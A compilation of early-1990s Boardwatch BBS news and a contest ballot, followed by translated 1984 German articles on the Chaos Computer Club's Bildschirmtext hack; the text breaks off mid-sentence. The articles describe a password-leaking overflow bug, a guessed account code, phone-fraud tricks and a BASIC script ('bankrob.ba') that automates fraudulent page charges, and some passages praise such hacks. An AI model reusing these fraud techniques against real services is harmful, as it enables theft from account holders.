Typically, any BBS is subject to receiving uploads of commercial software
from callers. And while most do a very good job of screening out the obvious
Microsoft Word or Lotus 123 program, there are tens of thousands of
commercial programs like EXPERT HOME DESIGNER that aren't immediately obvious
in an environment that also includes over 100,000 shareware titles that are
perfectly acceptable to carry online.

Most attempts by conscientious  system operators to automate the task of
separating commercial software from shareware software have had very limited
success. Typically, search software examines uploaded .ZIP files to detect
content files with a certain 32-bit Cyclic Redundancy Check (CRC) signature.
But these signatures have not proven to be reliable or unique. Andy Keeves of
Executive Network BBS in Mount Vernon, New York, has devised what may be the
beginnings of a solution. A database has been compiled using the FWKCS
"Content Signature" system made available by Dr. F.W. Kantor of New York with
the cooperation of several software manufacturers. Kantor's system uses a 64
bit signature based on both a CRC of the file and the file length. This is
proving significantly more reliable.

The Executive Network supplies a diskette with instructions to any software
manufacturer on request in order to help them identify critical components of
their work. When the manufacturer submits the generated "signatures" to the
Executive Network, they are incorporated into a database. A software program
automatically deletes any uploads containing one of the registered
signatures. Software manufacturers can request the identification software by
contacting Mr. Black at Executive Network voice (914)667-2150 or by modem at
(914)667-4567. There is no charge for either the diskette or the service. BBS
operators will be able to download the database for their own use at no
charge.  According to Keeves, the database already contains several thousand
signatures.

Executive Network is one of the largest bulletin boards in the country with
over 12 GB of files online, international e-mail, and vendor support areas.
The Executive Network Information System, 10 Fiske Place, Mount Vernon, NY
10550; (914)667-2150 voice; (914)667-4567 BBS; (914)667-4817.


 BUST TWO - OFFWORLD BBS SEIZED IN ST.LOUIS
 ------------------------------------------

Joey Jay operated one of the more popular bulletin board systems in the St.
Louis area. Offworld BBS operated on 32 telephone lines at (314)579-0700
using the DLX software popular among real-time chat systems. It gained quite
a following as a local chat system. Jay, 28 years old, operated the system
from the basement of his fathers home in Chesterfield Missouri. Some 4300
local callers frequented the system.

On Friday evening, January 15th, at about 8:52 PM CST, the FBI served a
search warrant and seized six computer systems, modems, all tape backups, -
some $40,000 worth of computer hardware and software in all - on suspicion of
interstate distribution of child pornography and images containing
bestiality.

According to Jay, there were images occasionally uploaded to the board as
file attachments on private e-mail between callers. When he would detect
them, he did delete them as a matter of practice and kick the caller off the
system. He routinely tossed them into a SHREDME directory for later deletion
with Norton's WIPE utility. He acknowledges that there were some questionable
images in the SHREDME directory when the computer equipment was seized and
notes he's not certain what was on the BBS as he had just returned from a
week of snowboarding in Colorado when the raid occurred. He did maintain a
regular file directory containing images of bestiality and was unaware it was
against the law to do so.

In addition to the equipment seizure, the FBI alluded to the fact that if the
system came back up, they could, under law, seize Jay's father's house. His
father asked Jay to move out of the premises.

About 100 angry Offworld users gathered the following Monday at a support
rally. Jay is receiving contributions of equipment and money to get the
system back online and plans to do so soon. He has a one line message system
up at the old number now. Jay originally started Offworld in Los Angeles
where it operated from February of 1984 until June of 1992, when he moved it
to the St. Louis area. He has retained Arthur Margulas, an ex-FBI agent and
federal crime attorney practicing in St. Louis to represent him, and has been
in close contact with Mike Godwin of the Electronic Frontier Foundation.


 STEVE JACKSON GAMES vs. U.S. SECRET SERVICE - TRIAL
 ---------------------------------------------------

On March 1, 1990, the United States Secret Service, participating in a
nationwide sweep code named Operation SunDevil, launched an early morning
raid on Steve Jackson Games, an Austin Texas publisher of role-playing games
and books. They broke locks on doors, seized and carted away all personal
computer equipment, business records, manuscripts of books being prepared for
publication, and all hardware and software of the Illuminati bulletin board
system run by SJG at (512)447-4449 to communicate with writers, customers,
and fans of the game series published by Jackson. Steve Jackson arrived at
work to find his business already loaded and ready to roll. Agents on the
scene refused to answer any questions, and they presented a search warrant
with essentially no information on it.

With his business records, computers, and manuscripts gone, Jackson laid off
workers in an effort to stave off bankruptcy. No charges were filed against
Jackson, and months of appeals to have the equipment and records returned met
with very limited success. In May, 1991, with the assistance of the
Electronic Frontier Foundation, Steve Jackson and the EFF filed a civil suit
against the United States Secret Service, Secret Service Agents Timothy Foley
and Barbara Golden, Assistant United States Attorney William Cook, and Henry
Kluepfel.

The case finally came to trial on Tuesday, January 26, 1993 at about 1:00 PM
in the U.S. District Court with Judge Sam Sparks presiding. Attorneys Jim
George and Pete Kennedy represented the plaintiffs. Their first witness was
agent Timothy Foley of the Secret Service. He acknowledged that he did know
that e-mail was on the BBS menu system, and explained that he refused to give
Jackson copies of anything that was on the BBS because he feared it might be
"booby-trapped." Although it was widely reported that he had told Steve
Jackson at the time that GURPS Cyberpunk, a fictional game published by SJG,
was a "handbook for computer crime." When questioned under oath, he denied
ever making such a statement. He also denied any knowledge that Congress had
granted special protections to publishers during searches under the Privacy
Protection Act.

Larry Couterie, a University of Texas police officer was called to the stand
next. An affidavit filed by Foley to support the search warrant application
indicated that Coutorie had provided the Secret Service with the business
address of one of Jackson's employees. Under questioning, Couterie denied
knowing anything about the employee, or providing any such information to
Foley.

Steve Jackson demonstrated for the court the operation of a BBS,
demonstrating a message conference with an old west theme. By all accounts,
the demonstration was quite entertaining and the judge seemed to enjoy it.

The next day, the plaintiff's continued their case with testimony by writers
who submit manuscripts to SJG, and by e-mail users of the BBS. Apparently,
over 160 electronic mail messages were never delivered due to the government
seizure of the system, and of course much was made of the impact on the
individuals lives due to messages they thought they had sent, but had never
actually been received, etc.

Wayne Bell, author of the WWIV software used on the Illuminati system,
testified after examining the BBS. This testimony was used to show that
Secret Service had indeed read all the mail on the BBS system with numerous
files updated weeks after the raid.

Much of the original warrant was based on information from Henry Kluepfel,
Director of Network Security Technology at Belcore. His testimony at the
trial did more to explain what actually happened to lead to the raid.
Apparently, they suspected a BBS titled the Phoenix Project, operating in
Austin, of having a copy of an E911 document stolen from a computer in
Atlanta. Their information led them to believe the Phoenix Project was
operating from the home of Loyd Blankenship, an employee of Steve Jackson
Games. But after February 7, 1991, the Phoenix Project couldn't be located -
it's telephone number didn't answer. Since Loyd Blankenship worked at Steve
Jackson games, and since Steve Jackson Games ran a BBS titled Illuminati that
used the same WWIV software, they decided that the Phoenix Project was
actually hidden behind a "secret door" on the Illuminati BBS. A comparison of
the userlogs of the two bulletin boards indicated there was only a single
common user to both systems - Loyd Blankenship.

William Cook, retired U.S. Attorney testified at the trial and made a couple
of interesting comments. He indicated that no charges were ever filed against
Loyd Blankenship. A good bit of this testimony revolved around SJG role as a
publisher and the abrogation by the Secret Service of any observance of the
Privacy Protection Act procedures for serving search warrants on publishers.
One of the most interesting aspects of Cook's testimony involved the status
of electronic mail. He asserted that e-mail messages that had been sent, but
not received, were not in transit electronic mail but rather "stored"
electronic mail. The judge questioned him on this point and he acknowledged
he had based this interpretation on nothing beyond his own view of the
subject.

The government only made a half-hearted attempt at defending its position on
the raid. Most of their activity centered on damage control - seeking to
disqualify the $2 million in damages and $150,000 in lost royalties claimed
by the plaintiff. They contended that Steve Jackson games had actually been
in financial difficulties for several years before the raid and implied that
the publicity caused by the raid actually helped his business. By Thursday,
the judge had had enough. He interrupted testimony to deliver a 15-minute
tirade directed at Secret Service agent Timothy Foley consisting of a series
of "Didn't you know/Didn't you ask" questions that amounted to a public
scolding.

Shaken, the government rested their case without calling any of their
scheduled remaining defense witnesses.

While the trial was dramatically one sided on behalf of Steve Jackson Games
and the EFF, and decidedly embarrassing for the Secret Service and the U.S.
Attorney, the outcome is unsettled. The judge took the matter under
advisement and at this writing, has not issued a ruling in the case. The EFF,
with SJG, is seeking to establish several things. First, that the Electronic
Communications Privacy Act ensures the privacy of electronic mail from
government seizure without warrants served to each e-mail correspondent.
Secondly, SJG as a publisher is entitled to special protection under search
warrants under the Privacy Protection Act. And third, that SJG is deserving
of monetary damages from the business disruption caused by the search. All of
these are relatively dramatic goals that would alter how the government deals
with bulletin boards in the future. And despite the one-sided appearance of
the trial, Judge Sparks ultimate ruling could deal with any of these elements
as he sees fit.


                     B O A R D W A T C H   M A G A Z I N E
                                 Announces the
            Boardwatch 100 Reader's Choice Bulletin Board Contest
                                  for 1993

                    WIN A FREE HIGH SPEED MODEM

  Boardwatch Magazine is sponsoring a contest to find the 100 most popular
  bulletin board systems in North America - and the ONE BBS most popular
  among callers.  The contest will run from January 1, 1993 through July 1,
  1993.  Winners will be announced at the Online Networking Exposition and
  BBS Convention (ONE BBSCON) held at the Broadmoor Hotel in Colorado Springs
  Colorado, August 25-29, 1993. The Boardwatch 100 list will be published in
  subsequent issues of Boardwatch Magazine and distributed in electronic
  form world-wide.

                    PRIZES FOR BULLETIN BOARD OPERATORS

  1ST PRIZE: Air fare, hotel accommodations and registration at ONE BBSCON
  for one is awarded to the system receiving the most votes.  Additionally,
  the system will receive a free full-page black and white advertisement in
  Boardwatch Magazine for a period of three months.  An award trophy will be
  presented at the ONE BBSCON and a feature story on their BBS will appear 
  in a subsequent issue of the magazine..

  TOP TEN:  The ten most popular bulletin boards selected by the voters will
  each receive an award trophy during a special presentation at the Online
  Networking Exposition and BBS Convention (ONE BBSCON) August 25-29,
  1993.  Additionally,  a story describing their system will appear in
  Boardwatch Magazine, they will be included in a special TOP TEN BBS listing
  in the magazine, and they will receive a free quarter-page black and white
  advertisement in three successive issues.  Finally, they will be listed in
  the Boardwatch 100 BBS list.

  TOP ONE HUNDRED: The 100 bulletin boards receiving the most votes will
  each be listed in the Boardwatch 100 readers choice BBS list.  This list
  will be published in Boardwatch Magazine and freely distributed
  electronically on thousands of bulletin boards world-wide.

                          PRIZES FOR VOTERS

  All valid ballots submitted by voters will be entered in a random
  sweepstakes drawing.  As of the opening date of this contest, prizes
  include TWO U.S. ROBOTICS COURIER DUAL STANDARD 16.8K MODEMS, two HAYES
  OPTIMA 14400 + FAX 144 modems, and two ZyXEL U-1496 14,400 bps modems
  - and more are on the way.  A minimum of six valid ballots will be
  selected from all entries and each will receive a free modem - from the 
  most popular modem manufacturers in the world.

  RULES FOR CALLERS

  Each voter can vote once, for a single bulletin board system.  Each ballot
  must be fully completed, and individually mailed by each voter.  One vote
  per address, and we will verify ballots as necessary.  There are three ways
  to vote:

  1. Printout and complete this ballot and mail to:

                             BOARDWATCH MAGAZINE
                             READERS CHOICE BBS CONTEST
                             5970 South Vivian Street
                             Littleton, CO 80127

  2. Print out, complete this ballot and FAX to (303)973-3731.

  3. Or, dial the Boardwatch BBS at (303)973-4222 and complete the online
  ballot provided on the main menu.

  Balloting closes at 23:59:59, June 30, 1993.

  This contest is not limited to Boardwatch Magazine subscribers, and no 
  purchase of any kind is required to participate in this contest.

  NOTE: We held this contest during 1992 and it generated 11,152 votes by the 
  close of balloting for some 1250 different bulletin boards.  The TOP system
  received about 450 votes. Your individual vote can have a tremendous impact 
  on the outcome of this contest.  Further, the odds of winning a modem in
  last years contest, were 1 in 1394 (8 modems awarded).

	RULES FOR BBS OPERATORS

  Bulletin Board Operators may encourage callers to vote for their system 
  by offering whatever inducements/encouragements they like.  There is one
  rule to this contest for BBS operators.  YOU MAY NOT HANDLE ANY VOTE AFTER
  THE CALLER HAS COMPLETED THE BALLOT.  YOU MAY NOT HANDLE IT IN ANY WAY.

  You may provide callers with anything you like, including postage paid 
  envelopes, printed matter, solicitations, etc.  But once they have 
  completed a ballot, if you touch, handle, or otherwise deal with the ballot
  in any way, your BBS will be disqualified from the contest without appeal 
  or recourse.  

  If you wish to post an electronic ballot on your BBS, you may post this file
  IN ITS ENTIRETY.  You may post any additional information you feel is
  appropriate, but this entire rules file must be available to all callers.

  Despite the fact that this contest has a minimum of rules, this one rule 
  does cause problems each year.  You cannot post online surveys or doors
  to allow voters to vote online.  This is vote handling.  You cannot accept
  ballots from callers and mail them for them.  You cannot accept ballots and
  fax them in for callers.  The rule of thumb is pretty clear: You can provide
  anything you like TO callers to induce them to vote.  There is NOTHING you
  can accept FROM callers in any way pertaining to this ballot at all.  THEY
  must complete the ballot and forward it to us themselves.  

  We actually received FEDEX packages on the final day of the contest last
  year from BBS operators who claimed to have collected a hundred or so 
  votes.  Infractions are dealt with quite economically - the BBS is summarily
  disqualified without recourse or appeal.

  One new element introduced in the 1993 contest is date scoring.  All ballots
  received from 1 January 1993 through 30 June 1993 will receive a date score
  based on the date of receipt.  Date scores will range from 180 for votes 
  received 1 January down to 1 for votes received on June 30.  These date
  stamp values are cummulative for each BBS and will be used to eliminate ALL
  ties in the TOP 100.  Since ties are quite common in this contest, it pays
  to get your votes in early.

  This contest is open to all bulletin boards worldwide with the sole 
  exception of the Boardwatch Magazine BBS - which is ineligible.  
  Commercial services such as Prodigy, America Online, CompuServe, are 
  considered to be networks and not bulletin boards for the purposes of this
  contest. HOWEVER, individual forums, roundtables, or special interest areas
  moderated by a specific human  SYSOP on those services and allowing callers
  to post messages in that specific area ARE considered to be bulletin boards
  for the purposes of this contest and may participate.  

  *************************************************************************
          BOARDWATCH 100 READERS CHOICE BBS CONTEST
                        1993 BALLOT FORM
  **************************************************************************

  BBS INFORMATION

  TITLE OF BBS YOU NOMINATE AS BEST BBS:

  -------------------------------------------------------------------------

  PRIMARY BBS ACCESS TELEPHONE NUMBER:
                                      -------------------------------------


   VOTER VERIFICATION INFORMATION

   Voter information will be used to verify a selected sampling of caller
   ballots.  Responses to certain questions will be used to produce 
   aggregate statistical information on BBS callers to be published in 
   Boardwatch Magazine in future issues. All information required. 
   Incomplete ballots will be discarded.

       VOTER NAME:
                  --------------------------------------------------------

  STREET ADDRESS:
                  ---------------------------------------------------------

  CITY:                                     STATE/PROVINCE:
       ------------------------------------                ----------------

  ZIP OR POSTAL CODE:                               COUNTRY
                     ------------------                    ----------------

  VOTER VOICE TELEPHONE NUMBER:
                               ------------------------

  AGE:         SEX:        PROFESSION:
      ------     M[ ]  F[ ]             ----------------------------------


  COMMUNICATIONS SOFTWARE USED:
                                 -------------------------------------

  HIGHEST MODEM SPEED YOUR MODEM SUPPORTS?  [ ] 1200 bps   [ ] 2400 bps
                                            [ ] 9600 bps   [ ] 14,400 bps

  MODEM MANUFACTURER AND MODEL
                               --------------------------------------------

  PERSONAL COMPUTER ARCHITECTURE: 
  MS-DOS -IBM PC/Compatible [ ]  Apple Macintosh [ ]  Other [ ] (specify)		

  DO YOU REGULARLY USE MICROSOFT WINDOWS?  yes[ ]   no[ ]

  HAVE YOU INSTALLED A SECOND TELEPHONE LINE FOR DATA USE? yes[ ]  no[ ]
  
  ESTIMATED TOTAL NUMBER OF CALLS YOU MAKE TO ALL BBSs PER MONTH
                                                                  _______

  ESTIMATED AVERAGE CALL DURATION: 
                                     ---------------
  
  GUESTIMATE THE DATE OF YOUR FIRST MODEM CALL -------------

SIGNATURE:                                       DATE:
             -------------------------------            -------------------

  For more information on ONE BBSCON '93 - call Peg Conniglio at 
  (303)693-5253 voice or the ONE BBSCON BBS at (303)693-5432.

  For more information about Boardwatch Magazine, dial (303)973-4222 by
  modem - or to subscribe by voice using MC/Visa (800)933-6038.
  Boardwatch Magazine is published monthly at $36 per year in U.S., Canada,
  and Mexico - $99 overseas.


[pp 38-40:  Article from DIE ZEIT, 30 November 1984, by Thomas von Randow]

Bildschirmtext:  A Blow Against the System

A Computer Club Discovers Breaches of Security in the Bundespost's BTX Program

"Whoever hooks up to the BTX system in the next two to three years should be
punished for stupidity."  This withering assessment of the Bundespost's new
service, Bildschirmtext, could be heard last week at the eighth conference of
data protection specialists in Cologne--from an authoritative source.  It was
spoken by the chairman of the Association for Data Protection (GDD), the
conference host, after he heard the comments of a computer entthusiast.  With
wit and a relaxed patter, Herwart ("Wau") Holland of Hamburg's "Chaos Computer
Club" (CCC) explained how he and his 23-year-old fellow club member, Steffen
Wernry, had managed to take the Bildschirmtext service for a ride.

It is easier to get a winning six-digit combination in the lottery than to
illegally acquire the password of a BTX subscriber, Bildschirmtext experts at
the Bundespost had boasted.  But that is exactly what the computer chaotics did
straight away.  An error, in professional circles called a bug, in the system's
computer program made it as simple as child's play for the hackers.  Many
Bildschirmtext users had already noticed that there was something wrong with
the program.

Suppliers compose full-screen images with information about what they have to
offer--merchandise from the mail-order catalogue, vacations, account statements
for bank customers, or simply letters to friends.  These "pages" can then be
called in by (authorized) BTX subscribers, and responses to the relevant
questions--concerning a flight booking or a money transfer, for example--can be
input at home on the keyboard of the BTX auxiliary unit.

However, space on a television screen is limited, and the BTX page can hold
only 1,626 characters.  So that the designer knows during editing how many
characters he has left on the page, this number is indicated at the bottom edge
of the screen.  Until recently, however, this number was wrong--programmers are
notoriously poor at mental arithmetic.  The page was full before the number of
available characters reached zero.  For this reason, many suppliers experienced
a chaotic overflow of characters, something that should not happen.

Suddenly, all sorts of words, numbers or incomprehensible letter sequences flit
by on the screen.  The reason for this character salad:  The creators of the
BTX program apparently forgot to take care of "trash disposal," i.e., to see to
it that excess text be ignored by the program or somehow set aside.  For that
reason, the excess characters force parts of the program writer onto the
screen, and they are, as the Hamburg hackers discovered, sometimes telling. 
Specifically, they sometimes reveal the very secret that a BTX subscriber must
guard most closely, his identification code.  This password is the key to
access to the system.  Although it cannot be used to plunder someone else's
bank account, it is possible to cause a great deal of mischief.  Merchandise
can be ordered, vacations can be booked, magazine subscriptions can be entered. 
By agreement, the legal holder of the security code is liable for all damage
thus incurred.

Steffen Wernry and his colleagues--the club is a registered subscriber--caused
masses of BTX pages to overflow and then studied the ghostly characters on the
screen.  In so doing, they discovered "usd 70000," the password for Hamburger
Sparkasse (Haspa).  Now they were able to carry out what they had been planning
for some time:  an impressive demonstration of the inadequacies of
Bildschirmtext.  They set up a "contribution page."  Suppliers may charge a
type of protection fee or contribution for each call-in of their pages,
although this fee cannot exceed DM 9.99.  The account of the subscriber who
calls in the page is automatically charged with the fee.  With the Sparkasse
password, the hackers now called in their own page--to the tune of DM 9.97.

The idea was for this to occur repeatedly, which is why a home computer was
programmed to automatically call in the page over and over again.  It did its
job well, and while the club members worked on other activities, the cash
register rang every three seconds.  From Saturday at 6:00 p.m. until Sunday at
1:00 p.m., a total of DM 135,000 was credited to the club's account, money
which they gladly returned to Haspa.

Long before computers were popular, American students dubbed a type of trick
using technology a "hack."  Legendary is the hack of Captain Crunch, a student
who took his name from a brand of breakfast cereal.  Inside the box of this
type of cereal was a small plastic whistle, that was coincidentally tuned to
exactly 2,600 hertz.  In the American telephone system, as Captain Crunch
discovered, this frequency, when whistled into the microphone of the telephone
receiver, caused a breakdown in the fee meter.

Word of the trick with free long-distance calls soon spread; it made the cereal
company rich and the telephone company poor.  Or at any rate, it was in a
difficult bind.  A decision had to be made between accepting the loss, the
amount of which was difficult to determine, and undertaking expensive technical
changes in the continental network.  Bell decided in favor of the second
option.

This type of blow against a computer system represents a wonderful triumph that
goes far beyond the financial advantage associated with it; it is a liberating
blow, which frees us for a few moments from the dominance of technology.  In
the 1930s, small-plot gardeners in Hamburg illuminated their houses free of
charge.  The supplier of electricity was the nearby antenna of a strong radio
broadcaster, from which energy was diverted using a simple trap circuit to the
lamps.  For years, this hack went undetected--and once it was finally blown
open, it elicited a fundamental legal debate:  Are radio waves movable property
under the meaning of the law?

The trickster who thought up the hack with the first push-button pay phone by
SEL just 10 years ago remained anonymous.  For this, he used a piezoelectric
lighter.  Whoever wanted to make a free phone call simply went to a telephone
booth with the SEL phone, inserted a five-mark piece and called his party.  But
before all the money was used up, the lighter had to be struck near the key
pad.  The spark from the lighter significantly disturbed the electronics and
the phone was then forced to assume that the connection had not been made, and
thus--in dubio pro comparticipte--the five-mark piece was returned.  In all pay
phones of that type, the logic boards had to be replaced.

For the victim, the hack is not only annoying, it is generally an educational
experience as well, revealing technical design flaws.  Naturally, as the degree
of complexity of the system increases, so does the potential for damage that
can be inflicted even with the first hack.  Thus, it is a wonder that the games
played by BTX hackers have thus far been harmless.  After all, they revealed
the wretchedness of the Bildschirmtext design with a degree of clarity that
leaves nothing to be desired.

In BTX's country of origin, Great Britain, hackers made a game out of cracking
Prince Philip's electronic mailbox.  The BTX mailboxes are definitely oddly
constructed.  Bildschirmtext letters that have already been mailed can be
rewritten later by the sender.  Any mailbox can even be rendered fully
inoperative.  In order to do so, all that is required--as the Hamburg Chaos
hackers also discovered--is that the command to repeat the entire call-in be
placed at the end of a page edit.  The page drawn up in this way then appears
repeatedly.  It also does so in the mailbox to which it is sent, the result
being that nothing else can be retrieved from it.  Only the Bundespost knows
how to break up this vicious cycle.

A microcomputer can also be connected to the Bildschirmtext system.  But pity
the poor soul who uses it to call in a crash program specialized for his type
of machine.  That will cause the computer to crash, destroying the programs
loaded in its memory.  The only thing that can be done then is to reboot.  The
destructive program is offered as a harmless Bildschirmtext page.  Advanced
hackers have even set them up as time bombs.  It is only later, once the page--
generally headed with silly sayings--is long forgotten that the machine breaks
down, so that generally the cause can no longer be determined.

The Bundespost should have learned its lesson long ago, before its pride and
joy, Bildschirmtext, was dealt a resounding blow last week by the Sparkasse
trick.  The piecemeal adjustments that they undertook in the past after every
announced BTX hack were apparently inadequate.  A program that needs so much
clearing up is hopelessly contaminated.

Naturally, the Bundespost knows this, and it grieves them in particular because
BTX had just overcome the last political hurdle on the path to being
universally introduced.  It also hurts since there is already a dearth of
interest in the new medium of communication.  According to predictions by the
Ministry, BTX should have around 150,000 subscribers by now.  In reality, that
figure is only a scant 19,000, of which 3,000 are suppliers.

It is questionable whether the Bundespost will be able to compensate for its
losses from IBM, who set up the system.  "Big Blue" will scarcely be able to
get out of supplying a new computer program.  And that could take two to three
years, which is the time that Reinhard Vossbein meant when he declared anyone
who subscribes to Bildschirmtext during that period guilty of stupidity.

[p 40:  Unattributed text]

MSG by GAST
20 November 1984, 5:10 a.m.

MICKI is thinking about the CCC's BTX gag (bravo, by the way...), and reaches
the following conclusion:

The more securely a system is protected against unauthorized access, the more
unauthorized the people who can uncover weaknesses must be.
Ultimately, you have a system to which only the unauthorized have access...

In this regard:  Keep on doing it!

[p 40:  Unattributed text of computer program]

10 REM bankrob.ba
20 REM Version 1.00
30 REM (c) 1984 by Wau
40 MOTOR OFF: 'Relay for money key
100 CLS:PRINT"Bankrob.ba -Restart procedure"
110 INPUT "Prior money received: ";MONEY
120 IN=52:'Time value key on
130 OUT=169:'Time value key off
150 CLS:PRINT0,"DM ";MONEY,"in: ";IN;" out: ";OUT;
160 PRINT90,"o<<<< out >>>> O"
170 PRINT130,"i<<<< in >>>> I"
180 PRINT170,"Stop with x      "
190 PRINT210,TIME$;:GOTO 1100
200 REM Rhomboid loop
210 MOTOR ON:PRINT40,"IN":PRINT40,TIME$:FOR I=1 TO IN:GOSUB 1000:NEXT I
220 MOTOR OFF:PRINT40,"OUT":FOR I=1 TO IN:GOSUB 1000:NEXT I
230 MOTOR ON:PRINT40,"IN":FOR I=1 TO IN:GOSUB 1000:NEXT I
240 MOTOR OFF:PRINT40,"OUT":FOR I=1 TO OUT:GOSUB 1000:NEXT I
250 MONEY=MONEY+9.97:PRINT0,"DM ";MONEY,"In: ";IN;" Out: ";OUT;
260 GOTO200
1000 REM Speed
1010 X$=INKEY$:IF X$="" THEN RETURN
1020 IF X$="o"THEN OUT=OUT-1:RETURN
1030 IF X$="O"THEN OUT=OUT+1:RETURN
1040 IF X$="i"THEN IN=IN-1:RETURN
1050 IF X$="I"THEN IN=IN+1:RETURN
1060 IF X$<>"x" THEN RETURN
1100 PRINT170,"Continue with x   "
1110 MOTOR OFF:PRINT40,"OUT"
1120 X$=INKEY$:IF X$="x" THEN 1150 ELSE 1120
1150 PRINT170,"Stop with x    ";GOTO 200

[pp 41-42:  Article by "Wau," from TAZ, 22 November 1984]

How the Hamburger Sparkasse BTX Code Was Cracked

Bildschirmtext Tested for Weaknesses

Ever since the coup by the Chaos Computer Club in Hamburg, who used a bug in
the Bildschirmtext system to charge fees of DM 135,000 to Hamburger Sparkasse,
Bildschirmtext, or BTX, has been a topic of discussion, and the chaotics from
the Chaos Club have made headlines.

Bildschirmtext is a big joke being played on consumers.  For more than seven
years, "field tests" were run in Berlin and Dsseldorf.  From the very
beginning, it was obvious that the system would be introduced following the
field tests, regardless of the results of the "tests."  The political objective
made immense investments possible, thus making it simply impossible to abandon
the system.  After the "test," the test subscribers could throw away their
equipment, since in the meantime it had become technically obsolete.  The
Bundespost paid for the technical conversion, giving all the subscribers a
1,000-mark credit, financed by the coins spent on pay telephone calls. 
Nevertheless, around one in six refused this attractive offer and terminated
BTX service.  The Bundespost predicted 150,000 subscribers by the end of 1984. 
It was actually a scant 20,000, which includes many who are not active
subscribers.  In the meantime, the Bundespost has stopped making its own
predictions, instead spending a couple of million on programs that are supposed
to provide better prognoses.

The Bundespost has invested more than DM 700 million in BTX.  If you compare
this to subsidies for opera houses, then the Bundespost has built a 35,000-mark
box for each subscriber.  The only problem is that the opera program is still
rather monotonous.

IBM is the supplier of the computer and of the programs for the current system. 
They had high hopes about their deal, and wanted to sell their system to a
number of countries.  After all, approximately 100 people worked on programming
for around two years.  If you spend DM 20,000 a month for one of these
specialists, that makes DM 50 million.  A succession of several executives was
in charge of the project.  There were only a few "minor details" to be improved
in the program, and with programs the smaller the correction, the more time
they take.

Chaos Team Becomes BTX Supplier

In the fall of 1984, after long debate, the Chaos Computer Club decided to
subscribe to BTX.  Naturally as a "supplier," since being a subscriber is not
interesting.  They started with the least expensive equipment, which was
technically refurbished.  Still, the first months were torturous.  The
prevailing mood with home computers is well-known:  "Turn it on--it doesn't
work."  But with the Bundespost, everyone expects that everything will work
fine.  It is only rarely that you get mail from the Bundespost saying, "Because
of work on the system, few telephone calls will be possible on the weekend." 
With Bildschirmtext, hardly anything worked.  Even an accent on a letter in a
person's name caused unexpected developments (and this in a "European" system). 
In terms of computerization, changing names with accepts is offered up as a
subversive strategy.  Moreover, the blocking and unblocking of pages did not
work.  Blocked pages were legible, unblocked ones were not.  The Bundespost
told people who complained that they were doing something wrong.  Blocked pages
are something like the closed doors in an Advent calendar.  On the first of
December, the first door is opened (in BTX:  unblocked), on the second the
second door, and so on.  The Bundespost has a Christmas calendar game of chance
in Bildschirmtext.  Every day, new letters behind a door can be seen, and on 24
December, there is a complete sentence (Season's Greetings from the
Bundespost).  But without any coercion, all the doors flew open on the first of
the month.  Either someone at the Bundespost typed something wrong, or the
system has yet another small bug.  The Chaos Computer Club (CCC) first got wind
of this on 12 December, and sent in the complete solution, the prize being
telephone credits.  It is interesting how many subscribers sent in the solution
before the CCC.  Does the Bundespost perhaps believe here as well that some
chaotics sneaked into the Bundespost to find the solution?

However, a major problem with BTX is composing pages.  The CCC does a type of
electronic newspaper, which is published irregularly.  Once a new article has
been written and is supposed to be loaded into the system, all eyes focus on
the lowest line, waiting for the message "ED007 EXECUTION NOT POSSIBLE AT
PRESENT" or otherwise "Won't work right now."

In order to penetrate the BTX system, all you need is the connection code. 
Every subscriber has a different 12-digit number.  This access authorization is
generally sent by pressing one key.  This is practical and reasonably safe. 
You can imagine it as a nine-digit padlock (the first three numbers are
generally zero) on your bicycle shed.  Secondly, there is a personal code word. 
This is comparable to a padlock on the bicycle itself.  And you can also put
your bicycle in a communal shed.  In BTX, this is called a "free-access
connection."  In that case, anyone can go into the communal shed and, if he
knows the number of a particular bicycle lock, he can move about in BTX and
take a look at things.  A lot of it is free of charge, but some information or
offerings cost money.  Springer-Verlag reports cost 1 pfennig, FRANKFURTER
ALLGEMEINE ZEITUNG reports cost 2 pfennigs, and the owner of the bicycle pays
for this, not the cyclist.

Test of BTX Weaknesses

At some point, discussion at CCC came back to BTX and the policy of the
Bundespost to simply ignore or deny the risks of BTX.  The question arose of
whether this was intentional or just stupid.  A test was decided on.  Who would
be the guinea pig?  The Bundespost Ministry in Bonn?  A single quote suffices
here:  BTX is allegedly secure because it is difficult to tap into the
telephone lines in this country, since they are all underground.

The BTX control facility in Ulm is not that interesting as a test object.  It
tries to keep the system running.  And the Berlin office of BTX is responsible
for calming down postal customers when something goes wrong.  The Central
Telecommunications Office (FTZ) in Darmstadt is the site where technical plans
and standards are drawn up.  There one might expect to find the practical
technicians who worked out the security system.  Those are the right people for
a test of BTX weaknesses.  Without giving it much more thought, the BTX
connection of the FTZ was tested one day by the CCC:  Do they or do they not
have free access?  In order to find out, their subscriber number had to first
be entered:  06151 83.  That is the telephone number for the FTZ.  Then there
is the prompt for the code word.  At this point, you can type in anything and
tell from the subsequent error message whether the FTZ has a free-access
connection or not.  The CCC typed something in, the same telephone number
again.  The FTZ was careless:  There was free access.  But even worse, the FTZ
had chosen its own telephone number as its secret code word.  That is clearly
more careless than one would have expected, certainly from Bundespost
specialists.

A record is kept by the Hamburg data protection commissioner of who worked on
Bildschirmtext when.  Since the BTX reports when someone was last "on," an
"outside use" can often be detected in this way.  But scarcely anyone keeps a
record of it; it is too tedious.  At any rate, the FTZ did not notice the
"outside use" by the CCC.  This cleared up the question:  The Bundespost was
not withholding and/or providing false information about BTX out of stupidity.

The CCC considered what it should do now.  The most obvious thing was of course
to get money from the Bundespost.  In order to do so, a page for which a fee is
charged must be called in by another BTX subscriber.  And that can be repeated
any number of times.  The highest price per page is currently DM 9.99.  With 1-
pfennig pages from Axel Springer, the CCC tested, at its own expense, how fast
money can be collected using that method.  In non-automatic operation, it
worked out to around DM 10 an hour.  For the CCC page, at DM 9.97, this would
be DM 10,000 an hour.  So you could really get something over night.  These
fees are charged on the telephone bill--in this case, the FTZ's telephone bill
--and transferred to the suppliers a couple of weeks later.  Right now, it is
not working again, the Bundespost has another bug in the program, and it hopes
to be able to pay the fees in February.  In principle, however, the money is
being recorded.

Getting the money would be phase one.  What then?  Should we sell this breach
of security to the Bundespost?  We could, as is normal in industry, "hack" DM
100,000 or more and then sell the Bundespost consultation on this problem for a
certain percentage of the money.  Or get free, lifetime telephone service for
the CCC or something like that.  The Bundespost had to pay for its gross
negligence.

In both cases, however, the price would have been silence.  Otherwise, the
concentrated rage of the postal authorities would have been forthcoming. 
Consequently, perhaps half a dozen officials would have tried to do something
to the CCC.

But the CCC wanted enlightenment about the risks of this new system.  To this
end, the finance transaction had to be made public.  Fine, but who should push
the starting button for the money transfer?  After all, it is an infringement
